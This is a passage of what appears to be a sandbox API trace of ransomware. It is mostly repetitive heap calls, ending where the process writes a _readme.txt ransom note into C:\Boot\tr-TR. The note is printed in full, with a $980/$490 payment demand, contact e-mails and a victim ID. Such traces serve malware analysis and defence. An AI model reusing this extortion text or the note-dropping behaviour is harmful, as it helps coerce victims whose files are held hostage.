Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.333] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.333] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.333] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.333] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.333] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0056.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.333] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.333] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.333] PathFindFileNameW (pszPath="") returned="" [0056.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.333] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.333] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.333] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.334] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.334] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0056.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.334] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0056.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.335] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.335] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.335] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.335] RtlAllocateHeap (HeapHandle=0x660000, 